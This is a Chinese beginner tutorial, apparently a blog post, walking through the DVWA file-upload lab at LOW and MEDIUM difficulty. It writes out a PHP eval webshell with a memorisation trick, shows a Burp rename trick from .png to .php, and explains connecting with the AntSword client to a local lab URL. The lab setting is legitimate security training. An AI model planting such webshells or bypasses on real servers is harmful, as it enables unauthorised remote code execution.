DVWA第4关--文件上传--蚁剑下载及使用方法--新手入门必看
摘要:本文介绍了文件上传漏洞的实战演示,重点讲解了LOW和MEDIUM难度的绕过方法。在LOW难度中,通过将一句话木马(如<?php @eval($_POST['123123']);?>)保存为.php文件直接上传;在MEDIUM难度中,先上传.png文件再用Burp改包为.php绕过前端校验。最后详细说明了如何使用蚁剑连接木马:拼接URL路径(如http://127.0.0.1:80
前言
本节课用到的工具有 中国蚁剑 burp等,因为靶场原因,导致HIGH无法复现,只能上传图片马,比赛近在咫尺,主播深表歉意,等比赛结束主播将排查原因,并补充
蚁剑下载
蚁剑是在github下载的,考虑到一些人的不方便性,这里直接用网盘分享下载,下载链接,进去后初始界面会初始化,可以新建文件夹来进行作为工作目录,会下载代码和解压,重点,这里最好让蚁剑使用管理员权限和开加速器,不然可能导致下载和解压过程失败,完成后可以开始的内容了
LOW难度
发现有一个上传文件的按钮,但是题目要求选择上传的图片

一般来说,文件上传上传的是木马文件,常见的是一句话木马,这里主播有个方便记忆的技巧,完整且标准的一句话木马是 <?php @eval($_POST['123123']);?> 技巧大概是 “<> ?”为家在外围,家庭成员php和@eval,但是@eval偷偷“()”将美刀$传输_在POST中,传输密码要牢记,中括号,单引号全用上,分号防止记混,如果还是不太懂请各位观众赎罪,主播文化有限,不过可以寻找ai再解释一下相信有更好的理解!需要牢记的是,$_POST(‘填写密码以此在蚁剑建立连接’),POST需要大写,而建立链接图中,蚁剑必须要求输入密码,这个秘密就是小括号()和单引号‘’中间填写的值
方便理解,这里在桌面新建txt文件,编写一句话木马,因为是low难度,所以主播命名为low.txt
里面写入一句话木马

然后将txt后缀名改为php,将他上传,上传成功为这样

PS:有同学会不理解,蚁剑连接需要输入url,直接输入网址栏无法连接怎么办?这里可以注意红色字体,它爆出了一个相关路径:
/hackable/uploads/low.php

将他进行路径拼接即可,注意看网址

这个网址是不完全的,它隐藏了http://这个传输头,我们只需要知道ip和端口即可,然后拼接红色的相对地址,所以往蚁剑输入的网址为http://127.0.0.1:8089/hackable/uploads/low.php即可,如图

然后点击测试链接,有些小伙伴会提示返回数据为空

这种一般是两个情况,第一个是内容问题导致这种问题产生的有两个因素,第一个是掺杂了中文符号,而我们需要使用英文符号,第二个因素是语句错误,拼写错了一个字母或者是小括号的密码与蚁剑的密码不相同导致的;第二种情况就是,用管理员权限运行蚁剑
这样我们就连接成功了
这一步弄完后代表我们建立连接了,然后点击测试连接的左边添加选项

这样就是真正意义的连接成功了,会发现数据管理新增一条记录,双击后就能查看详情


而low.php就是我们上传的一句话木马
LOW难度就这样通关了
medium难度
切换到 medium难度,我们先查看源代码

发现新增加了前端校验,如果不是PNG之类的图片格式,不允许上传,很多人以为这一步就要上传图片马之类的了,但是目前是用不到的,源代码只是做了简单的前端校验,注意,是前端校验而非服务端校验,可以绕过去,我们先创建txt文件,命名为medium.txt进行编写一句话木马

然后更改后缀为png !!!注意,这里改为png而非php因为有前端校验,我们打开burp,上传medium.png时抓包

直接查看第21行最后边,会发现filename项,而里面内容是我们上传的文件,这里我们直接再次修改文件扩展名,将png改为php上传即可绕过
![]()
点击放行,然后打开蚁剑建立连接,还是同样的url建立密码输入你写的密码即可

更多推荐


所有评论(0)